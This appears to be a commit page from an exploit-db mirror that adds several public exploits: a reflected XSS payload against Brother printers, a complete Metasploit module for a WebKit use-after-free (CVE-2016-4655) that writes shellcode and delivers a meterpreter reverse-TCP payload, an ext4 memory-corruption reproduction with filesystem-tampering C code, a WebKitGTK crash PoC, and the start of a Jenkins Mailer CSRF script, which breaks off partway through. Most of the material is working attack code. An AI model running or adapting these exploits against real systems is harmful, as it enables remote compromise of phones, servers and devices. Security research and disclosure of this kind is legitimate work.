bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-06-06

Browse source 
11 changes to exploits/shellcodes

Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption

Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit)
Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit)
Clone2GO Video converter 2.8.2 - Buffer Overflow
10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)
10-Strike Network Inventory Explorer 8.54 - 'Registration Key' Buffer Overflow (SEH)
10-Strike Network Scanner 3.0 - Local Buffer Overflow (SEH)
WebKitGTK+ < 2.21.3 - Crash (PoC)

WebKit - not_number defineProperties UAF (Metasploit)

EMS Master Calendar < 8.0.0.20180520 - Reflected Cross-Site Scripting
EMS Master Calendar < 8.0.0.20180520 - Cross-Site Scripting
MyBB Recent Threads Plugin 1.0 - Cross-Site Scripting
Pagekit < 1.0.13 - Cross-Site Scripting Code Generator
Brother HL Series Printers 1.15 - Cross-Site Scripting
Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)
This commit is contained in:
Offensive Security 2018-06-06 05:01:46 +00:00
parent 61159b7f3e
commit ad4b4f15f3
12 changed files with 1279 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

74
exploits/hardware/webapps/44839.md Normal file
View file

@ -0,0 +1,74 @@
# Exploit Title: [ XSS at Brother HL series printers]
# Date: [30.05.2018]
# Exploit Author: [Huy Kha]
# Vendor Homepage: [http://support.brother.com]
# Software Link: [ Website ]
# Version: Brother HL series printers.
# Tested on: Mozilla FireFox
# Reflected XSS Payload :
"--!><Svg/OnLoad=(confirm)(1)>"
# Description : Starting searching for printers without having a password.
When you see a yellow bar with ''Configure the password'' you can take over the full printer by putting a password on it.
# PoC :
If you want to execute the XSS you need to be loged into the web interface first.
# Example :
1. Go to the following url: http://127.0.0.1/
2. Login with ''admin'' as password
3. Intercept now the request with Burpsuite
4. The XSS exist in the loginerror.html?url= parameter
4. Demo URL: http://127.0.0.1/etc/loginerror.html?url=%2Fnet%2Fnet%2Fservice_detail.html%3Fservice%3D%2522--!%253E%253CSvg%2FOnLoad%3D(confirm)(1)%253E%2522%26pageid%3D241
# Request :
GET /etc/loginerror.html?url=%2Fnet%2Fnet%2Fservice_detail.html%3Fservice%3D%2522--!%253E%253CSvg%2FOnLoad%3D(confirm)(1)%253E%2522%26pageid%3D241 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
# Response :
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 3389
Content-Type: text/html
Content-Language: nl
Connection: close
Server: debut/1.20
Pragma: no-cache
<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html lang="nl" xmlns="http://www.w3.org/1999/xhtml" xml:lang="nl"><head><meta http-equiv="Content-Script-Type" content="text/javascript" /><meta http-equiv="content-style-type" content="text/css" /><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><script type="text/javascript" src="/common/js/ews.js"></script>
<link rel="stylesheet" type="text/css" href="../common/css/common.css" />
<link rel="stylesheet" type="text/css" href="../common/css/ews.css" /><title>Brother HL-L2340D series</title></head><body><div id="baseFrame"><div id="frameContainer"><div id="headerFrameContainerLeft"><div id="headerFrameContainerRight"><div id="headerFrameInner"><div id="headerFrame"><div id="modelName"><h1>HL-L2340D series</h1><div class="SetBox" id="SetBoxAuthRight"><div id="SetBoxAuthLeft"><form method="post" action="/general/status.html"><div>Log&#32;in<input type="password" id="LogBox" name="B1d6" /><input type="hidden" name="loginurl" value="/net/net/service_detail.html?service="--!><Svg/OnLoad=(confirm)(1)>"&pageid=241"/><input id="login" type="submit" value="&nbsp;" /></div></form></div></div></div><div id="corporateLogo"><img src="/common/images/logo.gif" alt="Brother" /></div></div><div id="solutions"><div><span><a href="http://solutions.brother.com/cgi-bin/solutions.cgi?MDL=prn088&LNG=en&SRC=DEVICE">Brother<br />Solutions&#32;Center</a></span></div></div><div id="tabMenu"><ul><li><ul><li class="selected"><p>Algemeen</p></li></ul></li></ul></div></div></div></div><div id="mainFrameContainer"><div id="mainFrameTopLeft"><div id="mainFrameTopRight"><div id="mainFrameTopInner"><div id="subTabMenu">&nbsp;</div></div></div></div><div id="mainFrameInner"><div id="subMenu"><div><a href="/general/status.html">Status</a></div><div><a href="/general/reflesh.html" class="subPage">Interval&#32;voor&#32;autom.&#32;vernieuwen</a></div><div><a href="/general/information.html?kind=item">Onderhoudsinformatie</a></div><div><a href="/general/lists.html">Lijsten/Rapporten</a></div><div><a href="/general/find.html">Apparaat&#32;zoeken</a></div><div><a href="/general/contact.html">Contactpersoon&#32;&&#32;locatie</a></div><div><a href="/general/sleep.html">Slaapstand</a></div><div><a href="/general/powerdown.html">Automatisch&#32;uitschakelen</a></div><div><a href="/general/language.html">Taal</a></div><div><a href="/general/panel.html">Paneel</a></div><div><a href="/general/replacetoner.html">Toner&#32;vervangen</a></div></div><div id="rightFrameContainer"><div id="rightFrame"><div id="mainContent"><div id="pageTitle"><h2>Log&#32;in</h2></div><div id="pageContents"><div class="contentsGroup"><p class="noteMessage">Om&#32;deze&#32;pagina&#32;te&#32;openen&#32;moet&#32;u&#32;inloggen.&#32;Log&#32;in&#32;s.v.p.</p></div></div></div></div></div><script type="text/javascript"><!--
SetMinHeight();
// --></script></div><div id="mainFrameBottomLeft"><div id="mainFrameBottomRight"><div id="mainFrameBottomInner"></div></div></div></div><div id="footerFrameContainer"><div id="copyright">Copyright(C) 2000-2014 Brother Industries, Ltd. All Rights Reserved.</div><div id="topBack"><a href="#">Top<img src="/common/images/ic_pt.gif" alt="Top" /></a></div></div></div></div></body></html>
# How to fix it? : Update the printer to Firmware 1.16 and set a new password.
# Screenshot : https://imgur.com/a/3OVTSZ4
# Note: The vendor has been contacted on 30-5-2018.

302
exploits/ios/remote/44836.rb Executable file
View file

@ -0,0 +1,302 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'WebKit not_number defineProperties UAF',
'Description' => %q{
This module exploits a UAF vulnerability in WebKit's JavaScriptCore library.
},
'License' => MSF_LICENSE,
'Author' => [
'qwertyoruiop', # jbme.qwertyoruiop.com
'siguza', # PhoenixNonce
'tihmstar', # PhoenixNonce
'timwr', # metasploit integration
],
'References' => [
['CVE', '2016-4655'],
['CVE', '2016-4656'],
['CVE', '2016-4657'],
['BID', '92651'],
['BID', '92652'],
['BID', '92653'],
['URL', 'https://blog.lookout.com/trident-pegasus'],
['URL', 'https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/'],
['URL', 'https://www.blackhat.com/docs/eu-16/materials/eu-16-Bazaliy-Mobile-Espionage-in-the-Wild-Pegasus-and-Nation-State-Level-Attacks.pdf'],
['URL', 'https://github.com/Siguza/PhoenixNonce'],
['URL', 'https://jndok.github.io/2016/10/04/pegasus-writeup/'],
['URL', 'https://sektioneins.de/en/blog/16-09-02-pegasus-ios-kernel-vulnerability-explained.html'],
],
'Arch' => ARCH_AARCH64,
'Platform' => 'apple_ios',
'DefaultTarget' => 0,
'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/aarch64/meterpreter_reverse_tcp' },
'Targets' => [[ 'Automatic', {} ]],
'DisclosureDate' => 'Aug 25 2016'))
register_options(
[
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ]),
OptString.new('URIPATH', [ true, "The URI to use for this exploit.", "/" ])
])
end
def on_request_uri(cli, request)
print_status("Request from #{request['User-Agent']}")
if request.uri =~ %r{/loader$}
print_good("Target is vulnerable.")
local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "loader" )
loader_data = File.read(local_file, {:mode => 'rb'})
send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
return
elsif request.uri =~ %r{/exploit$}
local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "exploit" )
loader_data = File.read(local_file, {:mode => 'rb'})
payload_url = "tcp://#{datastore["LHOST"]}:#{datastore["LPORT"]}"
payload_url_index = loader_data.index('PAYLOAD_URL')
loader_data[payload_url_index, payload_url.length] = payload_url
send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
print_status("Sent exploit (#{loader_data.size} bytes)")
return
end
html = %Q^
<html>
<body>
<script>
function load_binary_resource(url) {
var req = new XMLHttpRequest();
req.open('GET', url, false);
req.overrideMimeType('text/plain; charset=x-user-defined');
req.send(null);
return req.responseText;
}
var mem0 = 0;
var mem1 = 0;
var mem2 = 0;
function read4(addr) {
mem0[4] = addr;
var ret = mem2[0];
mem0[4] = mem1;
return ret;
}
function write4(addr, val) {
mem0[4] = addr;
mem2[0] = val;
mem0[4] = mem1;
}
filestream = load_binary_resource("exploit")
var shll = new Uint32Array(filestream.length / 4);
for (var i = 0; i < filestream.length;) {
var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24);
shll[i / 4] = word;
i += 4;
}
_dview = null;
function u2d(low, hi) {
if (!_dview) _dview = new DataView(new ArrayBuffer(16));
_dview.setUint32(0, hi);
_dview.setUint32(4, low);
return _dview.getFloat64(0);
}
var pressure = new Array(100);
var bufs = new Array(10000);
dgc = function() {
for (var i = 0; i < pressure.length; i++) {
pressure[i] = new Uint32Array(0x10000);
}
for (var i = 0; i < pressure.length; i++) {
pressure[i] = 0;
}
}
function swag() {
if (bufs[0]) return;
for (var i = 0; i < 4; i++) {
dgc();
}
for (i = 0; i < bufs.length; i++) {
bufs[i] = new Uint32Array(0x100 * 2)
for (k = 0; k < bufs[i].length;) {
bufs[i][k++] = 0x41414141;
bufs[i][k++] = 0xffff0000;
}
}
}
var trycatch = "";
for (var z = 0; z < 0x2000; z++) trycatch += "try{} catch(e){}; ";
var fc = new Function(trycatch);
var fcp = 0;
var smsh = new Uint32Array(0x10)
function smashed(stl) {
document.body.innerHTML = "";
var jitf = (smsh[(0x10 + smsh[(0x10 + smsh[(fcp + 0x18) / 4]) / 4]) / 4]);
write4(jitf, 0xd28024d0); //movz x16, 0x126
write4(jitf + 4, 0x58000060); //ldr x0, 0x100007ee4
write4(jitf + 8, 0xd4001001); //svc 80
write4(jitf + 12, 0xd65f03c0); //ret
write4(jitf + 16, jitf + 0x20);
write4(jitf + 20, 1);
fc();
var dyncache = read4(jitf + 0x20);
var dyncachev = read4(jitf + 0x20);
var go = 1;
while (go) {
if (read4(dyncache) == 0xfeedfacf) {
for (i = 0; i < 0x1000 / 4; i++) {
if (read4(dyncache + i * 4) == 0xd && read4(dyncache + i * 4 + 1 * 4) == 0x40 && read4(dyncache + i * 4 + 2 * 4) == 0x18 && read4(dyncache + i * 4 + 11 * 4) == 0x61707369) // lulziest mach-o parser ever
{
go = 0;
break;
}
}
}
dyncache += 0x1000;
}
dyncache -= 0x1000;
var bss = [];
var bss_size = [];
for (i = 0; i < 0x1000 / 4; i++) {
if (read4(dyncache + i * 4) == 0x73625f5f && read4(dyncache + i * 4 + 4) == 0x73) {
bss.push(read4(dyncache + i * 4 + (0x20)) + dyncachev - 0x80000000);
bss_size.push(read4(dyncache + i * 4 + (0x28)));
}
}
var shc = jitf;
var filestream = load_binary_resource("loader")
for (var i = 0; i < filestream.length;) {
var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24);
write4(shc, word);
shc += 4;
i += 4;
}
jitf &= ~0x3FFF;
jitf += 0x8000;
write4(shc, jitf);
write4(shc + 4, 1);
// copy macho
for (var i = 0; i < shll.length; i++) {
write4(jitf + i * 4, shll[i]);
}
for (var i = 0; i < bss.length; i++) {
for (k = bss_size[i] / 6; k < bss_size[i] / 4; k++) {
write4(bss[i] + k * 4, 0);
}
}
fc();
}
function go_() {
if (smsh.length != 0x10) {
smashed();
return;
}
dgc();
var arr = new Array(0x100);
var yolo = new ArrayBuffer(0x1000);
arr[0] = yolo;
arr[1] = 0x13371337;
var not_number = {};
not_number.toString = function() {
arr = null;
props["stale"]["value"] = null;
swag();
return 10;
};
var props = {
p0: {
value: 0
},
p1: {
value: 1
},
p2: {
value: 2
},
p3: {
value: 3
},
p4: {
value: 4
},
p5: {
value: 5
},
p6: {
value: 6
},
p7: {
value: 7
},
p8: {
value: 8
},
length: {
value: not_number
},
stale: {
value: arr
},
after: {
value: 666
}
};
var target = [];
var stale = 0;
Object.defineProperties(target, props);
stale = target.stale;
stale[0] += 0x101;
stale[1] = {}
for (var z = 0; z < 0x1000; z++) fc();
for (i = 0; i < bufs.length; i++) {
for (k = 0; k < bufs[0].length; k++) {
if (bufs[i][k] == 0x41414242) {
stale[0] = fc;
fcp = bufs[i][k];
stale[0] = {
'a': u2d(105, 0),
'b': u2d(0, 0),
'c': smsh,
'd': u2d(0x100, 0)
}
stale[1] = stale[0]
bufs[i][k] += 0x10; // misalign so we end up in JSObject's properties, which have a crafted Uint32Array pointing to smsh
bck = stale[0][4];
stale[0][4] = 0; // address, low 32 bits
// stale[0][5] = 1; // address, high 32 bits == 0x100000000
stale[0][6] = 0xffffffff;
mem0 = stale[0];
mem1 = bck;
mem2 = smsh;
bufs.push(stale)
if (smsh.length != 0x10) {
smashed(stale[0]);
}
return;
}
}
}
setTimeout(function() {
document.location.reload();
}, 2000);
}
dgc();
setTimeout(go_, 200);
</script>
</body>
</html>
^
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end

282
exploits/linux/dos/44832.txt Normal file
View file

@ -0,0 +1,282 @@
ext4 can store data for small regular files as "inline data", meaning that the
data is stored inside the corresponding inode instead of in separate blocks.
Inline data is stored in two places: The first 60 bytes go in the i_block field
in the inode (which normally contains a list of blocks instead), the rest goes
in the special filesystem-internal extended attribute "system.data".
Since commit e50e5129f384 ("ext4: xattr-in-inode support", in v4.13+), ext4 can
store extended attribute values not only inline in the inode, but can also store
such values in dedicated inodes.
When a corrupted filesystem stores the system.data extended attribute value in a
dedicated inode, the kernel gets confused, causing memory corruption.
ext4_find_inline_data_nolock() attempts to locate an inode's inline data by
searching for the system.data xattr using ext4_xattr_ibody_find().
If the inode has xattrs, ext4_xattr_ibody_find() first checks them for
corruption using xattr_check_inode(), then grabs the wanted xattr using
xattr_find_entry().
xattr_check_inode() uses ext4_xattr_check_entries() to check the individual
xattrs, but skips most checks if `entry->e_value_inum != 0` (marking an xattr
whose value is in a dedicated inode) - only for inline values, length and offset
checks are performed to ensure that the value actually fits into the inode.
The problem is that ext4_find_inline_data_nolock() then assumes that the
returned xattr uses inline storage and that the returned length will fit into
the inode; it stores the length field from the xattr in
`EXT4_I(inode)->i_inline_size` without further checks.
Later, when the file is read, ext4_read_inline_data() trusts this length value,
causing an out-of-bounds memcpy() in the following line:
memcpy(buffer,
(void *)IFIRST(header) + le16_to_cpu(entry->e_value_offs), len);
To reproduce, on a system with kernel v4.13 or newer, ideally with KASAN on:
1. Create a new ext4 filesystem image, with 256-byte inodes and inline data
support:
$ mkfs.ext4 -b 4096 -I 256 -O inline_data testfs.img 400k
mke2fs 1.43.7 (16-Oct-2017)
Creating regular file testfs.img
Filesystem too small for a journal
Creating filesystem with 100 4k blocks and 64 inodes
Allocating group tables: done
Writing inode tables: done
Writing superblocks and filesystem accounting information: done
2. Create a 75-byte file in the new filesystem:
$ mkdir mount
$ sudo mount testfs.img mount
$ sudo dd bs=75 count=1 if=/dev/zero of=mount/testfile
1+0 records in
1+0 records out
75 bytes copied, 0.000811554 s, 92.4 kB/s
$ sudo umount mount
3. Bump up the inode size, bump up the xattr size, and mark the xattr value as
non-inline:
$ cat fixup.c
#include <stdint.h>
#include <fcntl.h>
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/stat.h>
#define __le16 uint16_t
#define __le32 uint32_t
#define __u16 uint16_t
#define __u32 uint32_t
#define __u8 uint8_t
/* some definitions from kernel headers */
#define EXT4_NDIR_BLOCKS 12
#define EXT4_IND_BLOCK EXT4_NDIR_BLOCKS
#define EXT4_DIND_BLOCK (EXT4_IND_BLOCK + 1)
#define EXT4_TIND_BLOCK (EXT4_DIND_BLOCK + 1)
#define EXT4_N_BLOCKS (EXT4_TIND_BLOCK + 1)
#define EXT4_XATTR_MAGIC 0xEA020000
struct ext4_inode {
__le16 i_mode;
__le16 i_uid;
__le32 i_size_lo;
__le32 i_atime;
__le32 i_ctime;
__le32 i_mtime;
__le32 i_dtime;
__le16 i_gid;
__le16 i_links_count;
__le32 i_blocks_lo;
__le32 i_flags;
union {
struct {
__le32 l_i_version;
} linux1;
} osd1;
__le32 i_block[EXT4_N_BLOCKS];
__le32 i_generation;
__le32 i_file_acl_lo;
__le32 i_size_high;
__le32 i_obso_faddr;
union {
struct {
__le16 l_i_blocks_high;
__le16 l_i_file_acl_high;
__le16 l_i_uid_high;
__le16 l_i_gid_high;
__le16 l_i_checksum_lo;
__le16 l_i_reserved;
} linux2;
} osd2;
__le16 i_extra_isize;
__le16 i_checksum_hi;
__le32 i_ctime_extra;
__le32 i_mtime_extra;
__le32 i_atime_extra;
__le32 i_crtime;
__le32 i_crtime_extra;
__le32 i_version_hi;
__le32 i_projid;
};
struct ext4_xattr_ibody_header {
__le32 h_magic;
};
struct ext4_xattr_entry {
__u8 e_name_len;
__u8 e_name_index;
__le16 e_value_offs;
__le32 e_value_inum;
__le32 e_value_size;
__le32 e_hash;
char e_name[0];
};
#define INODE_SIZE 256
#define ROUND_UP(x,round) ( ((x)+((round)-1)) & ~((round)-1) )
int main(int argc, char **argv) {
char *path = argv[1];
int fd = open(path, O_RDWR);
if (fd == -1) err(1, "open");
struct stat st;
if (fstat(fd, &st)) err(1, "fstat");
char *map = mmap(NULL, st.st_size, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
if (map == MAP_FAILED) err(1, "mmap");
for (int i=0; i<st.st_size/INODE_SIZE; i++) {
struct ext4_inode *ino = (void*)(map + i * INODE_SIZE);
if (ino->i_links_count != 1 || ino->i_size_lo != 75) continue;
printf("found inode (idx=%d, size=%u, mode=%ho)\n",
i, ino->i_size_lo, ino->i_mode);
ino->i_size_lo = 60000;
printf(" i_extra_isize = %hu\n", ino->i_extra_isize);
struct ext4_xattr_ibody_header *hdr =
(void*)( ((char*)ino)+128+ino->i_extra_isize );
if (hdr->h_magic != EXT4_XATTR_MAGIC) continue;
struct ext4_xattr_entry *entry = (void*)(hdr+1);
while (*(uint32_t*)entry != 0) {
printf(" attr: idx=%hhu name='%*s' offs=%hu inum=%u size=%u\n",
entry->e_name_index, entry->e_name_len, entry->e_name,
entry->e_value_offs, entry->e_value_inum, entry->e_value_size);
entry->e_value_offs = 0;
entry->e_value_inum = 20;
entry->e_value_size = 60000;
entry = (void*)(
(char*)entry + sizeof(*entry) + ROUND_UP(entry->e_name_len, 4)
);
}
}
}
$ gcc -o fixup fixup.c -Wall
$ ./fixup testfs.img
found inode (idx=555, size=75, mode=100644)
i_extra_isize = 32
attr: idx=7 name='data' offs=76 inum=0 size=15
4. Use fsck to fix up the inode checksum (but don't let it fix anything else!):
$ fsck.ext4 -f testfs.img
e2fsck 1.43.7 (16-Oct-2017)
Pass 1: Checking inodes, blocks, and sizes
Inode 12 has INLINE_DATA_FL flag but extended attribute not found. Truncate<y>? no
Extended attribute in inode 12 has a value size (60000) which is invalid
Clear<y>? no
Inode 12 passes checks, but checksum does not match inode. Fix<y>? yes
Pass 2: Checking directory structure
Pass 3: Checking directory connectivity
Pass 4: Checking reference counts
Pass 5: Checking group summary information
testfs.img: ***** FILE SYSTEM WAS MODIFIED *****
testfs.img: ********** WARNING: Filesystem still has errors **********
testfs.img: 12/64 files (0.0% non-contiguous), 13/100 blocks
5. Mount the filesystem again:
$ sudo mount testfs.img mount
6. Read the file:
$ hexdump -C mount/testfile
00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000030 00 00 00 00 00 00 00 00 00 00 00 00 04 07 00 00 |................|
00000040 14 00 00 00 60 ea 00 00 00 00 00 00 64 61 74 61 |....`.......data|
00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
000004a0 31 00 00 00 00 00 00 00 e0 d1 fc 98 d7 7f 00 00 |1...............|
000004b0 e0 07 03 99 d7 7f 00 00 00 00 00 00 00 00 00 00 |................|
000004c0 00 00 00 00 00 00 00 00 e0 5f 00 00 00 00 00 00 |........._......|
000004d0 64 00 00 00 00 00 00 00 f0 af 02 99 d7 7f 00 00 |d...............|
000004e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
[...]
7. Check dmesg:
$ dmesg
[...]
[ 3211.552729] ==================================================================
[ 3211.552782] BUG: KASAN: use-after-free in ext4_read_inline_data+0x114/0x120 [ext4]
[ 3211.552787] Write of size 59940 at addr ffff8802ba1d003c by task pool/12922
[ 3211.552796] CPU: 3 PID: 12922 Comm: pool Not tainted 4.17.0-rc4+ #7
[ 3211.552798] Hardware name: LENOVO 20FCS12V06/20FCS12V06, BIOS N1FET43W (1.17 ) 08/02/2016
[ 3211.552799] Call Trace:
[ 3211.552807] dump_stack+0x71/0xab
[ 3211.552813] print_address_description+0x6a/0x250
[ 3211.552817] kasan_report+0x258/0x380
[ 3211.552863] ? ext4_read_inline_data+0x114/0x120 [ext4]
[ 3211.552867] memcpy+0x34/0x50
[ 3211.552914] ext4_read_inline_data+0x114/0x120 [ext4]
[ 3211.552961] ext4_read_inline_page+0x1e4/0x2a0 [ext4]
[ 3211.553006] ? ext4_read_inline_data+0x120/0x120 [ext4]
[ 3211.553053] ext4_readpage_inline+0x13e/0x160 [ext4]
[ 3211.553101] ext4_readpage+0xf5/0x110 [ext4]
[ 3211.553106] generic_file_read_iter+0x9a4/0xea0
[ 3211.553112] ? filemap_range_has_page+0x160/0x160
[ 3211.553116] ? save_stack+0x89/0xb0
[ 3211.553120] ? __kasan_slab_free+0x105/0x150
[ 3211.553124] ? aa_path_link+0x1f0/0x1f0
[ 3211.553128] ? do_syscall_64+0x150/0x160
[ 3211.553132] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 3211.553137] ? audit_watch_compare+0x1b/0x50
[ 3211.553142] __vfs_read+0x239/0x340
[ 3211.553145] ? __x64_sys_copy_file_range+0x2d0/0x2d0
[ 3211.553149] ? dput.part.19+0x2e/0x1b0
[ 3211.553154] ? auditd_test_task+0x43/0x60
[ 3211.553158] vfs_read+0xa5/0x190
[ 3211.553162] ksys_read+0xa1/0x120
[ 3211.553166] ? kernel_write+0xa0/0xa0
[ 3211.553171] do_syscall_64+0x6d/0x160
[ 3211.553175] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 3211.553178] RIP: 0033:0x7f9ada1af72c
[ 3211.553180] RSP: 002b:00007f9ac2258888 EFLAGS: 00000246 ORIG_RAX: 0000000000000000
[...]
[ 3211.553197] The buggy address belongs to the page:
[ 3211.553202] page:ffffea000ae87400 count:2 mapcount:0 mapping:ffff88021fe57898 index:0x0
[ 3211.553207] flags: 0x17fffc000000021(locked|lru)
[ 3211.553213] raw: 017fffc000000021 ffff88021fe57898 0000000000000000 00000002ffffffff
[ 3211.553219] raw: ffffea000858fc20 ffff8803d0a204a0 0000000000000000 ffff8803cf31cac0
[ 3211.553222] page dumped because: kasan: bad access detected
[ 3211.553224] page->mem_cgroup:ffff8803cf31cac0
[ 3211.553229] Memory state around the buggy address:
[ 3211.553234] ffff8802ba1d0f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 3211.553238] ffff8802ba1d0f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 3211.553243] >ffff8802ba1d1000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
[ 3211.553246] ^
[ 3211.553250] ffff8802ba1d1080: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
[ 3211.553254] ffff8802ba1d1100: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
[ 3211.553257] ==================================================================

66
exploits/linux/local/44842.txt Normal file
View file

@ -0,0 +1,66 @@
# Title: WebKitGTK+ < 2.21.3 - Crash (PoC)
# Author: Dhiraj Mishra
# Date: 2018-06-05
# Software: https://webkitgtk.org/
# CVE: CVE-2018-11646
# Summary:
# webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in
# UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3,
# mishandle an unset pageURL, leading to an application crash, CVE-2018-11646 was assigned to this issue.
# PoC:
<script>
win = window.open("sleep_one_second.php", "WIN");
window.open("https://www.paypal.com", "WIN");
win.document.execCommand('Stop');
win.document.write("Spoofed URL");
win.document.close();
</script>
Backtrace using fedora 27:
#0 WTF::StringImpl::rawHash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 508
#1 WTF::StringImpl::hasHash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 514
#2 WTF::StringImpl::hash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 525
#3 WTF::StringHash::hash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringHash.h line 73
#9 WTF::HashMap, WTF::HashTraits >::get
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/HashMap.h line 406
#10 webkitFaviconDatabaseSetIconURLForPageURL
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 193
#11 webkitFaviconDatabaseSetIconForPageURL
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 318
#12 webkitWebViewSetIcon
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitWebView.cpp line 1964
#13 WTF::Function::performCallbackWithReturnValue
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/GenericCallback.h line 108
#15 WebKit::WebPageProxy::dataCallback
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 5083
#16 WebKit::WebPageProxy::finishedLoadingIcon
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 6848
#17 IPC::callMemberFunctionImpl::operator()
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 68
#29 WTF::RunLoop::::_FUN(gpointer)
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 70
#30 g_main_dispatch
at gmain.c line 3148
#31 g_main_context_dispatch
at gmain.c line 3813
#32 g_main_context_iterate
at gmain.c line 3886
#33 g_main_context_iteration
at gmain.c line 3947x
#34 g_application_run
at gapplication.c line 2401
#35 main
at ../src/ephy-main.c line 432
# Reference's:
# https://bugs.webkit.org/show_bug.cgi?id=186164
# https://bugzilla.gnome.org/show_bug.cgi?id=795740

219
exploits/linux/webapps/44843.py Executable file
View file

@ -0,0 +1,219 @@
# Exploit Title : Jenkins mailer plugin < 1.20 - Cross-Site Request Forgery
# Date : 2018-06-05
# Exploit Author : Kl3_GMjq6
# Vendor Homepage : https://jenkins.io/
# Software Link : [https://updates.jenkins.io/download/plugins/mailer/1.20/mailer.hpi]
# Version: [Below Version 1.20 (1.1 ~ 1.20) ]
# Ref: https://jenkins.io/security/advisory/2018-03-26/#SECURITY-774
# Tested on : Linux , Windows
# CVE : CVE-2018-8718
import email.message
import smtplib
import getpass
payload_list = ['url','subject','cover_message','sender','reciver','test_email','smtp_server','l_id','l_pw']
table = {}
for i in payload_list :
table.update({i:''})
def send_mail() :
msg = email.message.Message()
msg['Subject'] = table['subject']
msg['From'] = table['sender']
msg['To'] = table['reciver']
msg.add_header('Content-Type','text/html')
msg.set_payload('<a href="'+table['url']+'\
/descriptorByName/hudson.tasks.Mailer/sendTestMail?\
charset=UTF-8&sendTestMailTo='+table['test_email']+'&adminAddress='+table['reciver']+'\
&smtpPort=465&smtpServer='+table['smtp_server']+'&smtpAuthPasswordSecret='+table['l_pw']+'\
&useSMTPAuth=true&useSsl=true&smtpAuthUserName='+table['l_id']+'">\
'+table['cover_message']+'</a>')
s = smtplib.SMTP(table['smtp_server'])
s.starttls()
s.login(table['l_id'],
table['l_pw'])
s.sendmail(msg['From'], [msg['To']], msg.as_string())
def url_set() :
